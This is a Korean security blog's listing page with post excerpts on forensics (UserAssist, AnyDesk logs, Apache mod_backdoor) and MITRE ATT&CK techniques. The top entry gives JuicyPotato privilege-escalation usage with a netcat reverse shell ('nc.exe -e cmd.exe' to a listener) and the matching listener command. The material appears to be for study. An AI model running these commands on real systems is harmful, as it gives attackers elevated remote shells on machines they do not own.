공부/ETC
JuciyPotato usage
- Victim jp.exe -t * -p C:\Users\12\Desktop\2312\r-shell.bat.bat -l 1337 - shell.bat START C:\Users\12\Desktop\2312\nc.exe -e cmd.exe 10.10.10.10 1111 - Client nc -nlvp 1111
전체 글
정보보안 블로그!공부/ETC
QEMU image convert to vmdk - QEMU 이미지 변환
클라우드 서비스를 이용하여 관련 이미지를 import하는 경우, QEMU 형식의 파일로 저장될때가 있음. 이 경우, FTK Imager 등으로 인식이 안되는데 이때 아래 도구로 변환이 가능함 qemu-img for Windows https://cloudbase.it/qemu-img-windows/ 도구 다운로드 후 아래 방식으로 현재 이미지 파일의 형식을 먼저 확인 qemu-img.exe info [이미지 파일] "file format" 부분에 현재 이미지 형식을 확인한 뒤, 아래 명령어로 변환 진행 # qemu-img.exe convert -f [기존 이미지 형식] -O [변환 이미지 형식] [기존 이미지명] [변환 이미지명] qemu-img.exe convert -f qcow2 -O vmdk IMAG..
공부/Forensic
Artifacts to check file execution history on Windows system - UserAssist: Windows 시스템에서 파일 실행 이력을 확인하는 아티팩트 - UserAssist
🗣️ Introduction Windows 운영 체제에서 사용자의 파일 실행 이력을 추적하고 분석하는 것은 시스템 및 사용자 관리, 보안, 패턴(사용추이 등)파악 등 다양한 목적에 도움이 됩니다. 특히, 침해사고 분야에서는 실행 이력을 통해 다양한 정보를 파악할 수 있습니다. 먼저, 침해사고 분석에서는 악성코드 실행 및 정보 유출 유무등 실행된 악성코드를 파악하고 분석하여 공격자가 어떤 행위를 수행하였는지에 대해 확인할 수 있습니다. 또한, 기업에서는 비인가 프로그램 실행 유무, 시스템 성능 저하와 관련된 문제를 확인하고 대처할 수 있게됩니다. 이러한 실행 이력은 Windows 시스템 내 다양한 아티팩트에서 확인이 가능하며, 이 글에서는 실행 이력과 관련된 주요 아티팩트들 중 "UserAssist" 대해..
기타
티스토리 게시글에 이모지(Emoji) 넣기
https://ant.design/ Ant Design - The world's second most popular React UI framework Ant Design 5.0 use CSS-in-JS technology to provide dynamic & mix theme ability. And which use component level CSS-in-JS solution get your application a better performance. ant.design https://getemoji.com/ 😋 Get Emoji — All Emojis to ✂️ Copy and 📋 Paste 👌 ✂️ Copy and 📋 Paste Emoji 👍 No apps required Emojis are sup..
공부/Forensic
AnyDesk를 통한 침해사고 로그 분석
🗣️ Introduction 원격 데스크톱 소프트웨어는 사용자가 원격으로 다른 컴퓨터를 제어하고 조작하는 데 매우 유용한 도구입니다. 그중에서도 AnyDesk는 빠르고 안전한 원격 접속을 제공하며, 전 세계 수많은 사용자들에게 인기를 얻고 있습니다. 하지만 이러한 기술이 합법적인 용도로 사용될 수 있다는 것은 물론, 사이버 범죄자들에 의해 악용될 수도 있다는 점을 인식해야 합니다. AnyDesk의 경우, Portable 버전으로 사용이 가능하며 비밀번호 설정을 통해 사용자의 허용 없이 원격으로 접근이 가능합니다. 이러한 특징으로 인해 공격자들은 방화벽 우회, 안티 바이러스 제품 우회 등의 목적을 가지고 AnyDesk를 공격에 활용합니다.실제로, 콘티(Conti), MassScan 랜섬웨어 등 공격자들은 ..
공부/Forensic
아파치 모듈 백도어 기능 및 아티팩트 분석: Apache Mod_Backdoor operation method and Artifact analysis
🗣️ Introduction 웹 서버는 인터넷의 핵심 구성 요소 중 하나로, 웹 페이지를 호스팅하고 사용자에게 웹 콘텐츠를 전달하는데 사용됩니다. 인터넷 상에서 가장 널리 사용되는 웹 서버 소프트웨어 중 하나는 Apache HTTP 서버입니다. 그러나 웹 서버의 보안은 항상 중요한 관심사였으며, 악의적인 공격자들은 여러 방법으로 시스템을 침해하려고 시도합니다. 본 게시물은 Apache HTTP 서버의 백도어 중 하나인 Apache2 mod_backdoor에 대해 소개하고 이에 대한 로그를 분석하고자 합니다. **Apache2 mod_backdoor**는 Apache2 모듈을 사용하는 은밀한 백도어로서, 공격자에게 무단으로 웹 서버에 액세스할 수 있는 기회를 제공합니다. 이 백도어는 시스템의 보안에 심각한..
공부/Forensic
MS-SQL 대상 공격 방식 중 하나인 CLR Assembly(Shell) 공격 : MS-SQL Attacks via the CLR as an alternative to xp_cmdshell
🗣️ Introduction MS-SQL에서는 xp_cmdshell이라는 프로시저를 통해 Windows Command 명령을 수행할 수 있습니다. 하지만 보안상의 이유로 기본적으로 비활성화되어 있으며, xp_cmdshell을 통한 명령 실행의 경우에도 필터링 등으로 차단될 가능성이 높다. SQL Server 2005 부터 Microsoft Windows .NET Framework 의 CLR(Common Language Runtime) 기능을 제공합니다. 이를 통해, NET Framework 언어로 작성된 코드를 SQL Server에서 실행할 수 있게되어 C# 또는 Visual Basic .NET과 같은 .NET Framework 언어로 작성된 함수, 프로시저, 데이터 형식 등을 SQL Server에서 직..
MITRE ATT&CK
MITRE ATT&CK - Signed Binary Proxy Execution
Notion : https://oval-taste-7e9.notion.site/Signed-Binary-Proxy-Execution-5762c9f05e144616a0178ff8013278b6 1. Signed Binary Proxy Execution Sub-Techniques Sub-techniques **T1218.001 - Compiled HTML File** **T1218.002 - Control Panel** **T1218.003 - CMSTP ( Microsoft Connection Manager Profile Installer )** **T1218.004 - InstallUtil** **T1218.005 - Mshta ( Microsoft HTML Application )** **T1218.0..
MITRE ATT&CK
MITRE ATT&CK - Process Injection
Notion : https://oval-taste-7e9.notion.site/Process-Injection-02685376049140bdabcfc82ff562331c S1. Get Target Process Handle 새로운 프로세스 생성 또는 실행 중인 프로세스의 핸들 획득 CreateProcess / OpenProcess svchost.exe, rundll32.exe, ... S2. Alloc Virtual Address Memory for Target Process 타겟프로세스의 가상주소공간에 새로운 메모리 영역(DLL 삽입 공간) 할당 상황에 따라 토큰 활성화 필요 SeDebugPrivilege OpenProcessToken LookupPrivilegeValue AdjustTokenPrivi..
MITRE ATT&CK
MITRE ATT&CK - Masquerading
Notion Link : https://oval-taste-7e9.notion.site/Masquerading-6f1f6847b6a44c3db7cda50ac8969682 1. MITRE ATT&CK ID: T1036 Masquerading ID: T1036.001 Invalid Code Signature 유효하거나 유효하지않은 인증서로 파일에 서명을 추가해 신뢰하도록 만드는 방식 예방 서명의 유효성 검사를 진행 Masquerading: Invalid Code Signature ID: T1036.002 Right-to-Left Override U+202E 유니코드문자열을 이용한 공격방식 특정 문화 국가에서는 문자를 오른쪽에서부터 읽기에 해당 유니코드를 지원했는데, 이를 공격에 악용 - 오른쪽에서 왼쪽으..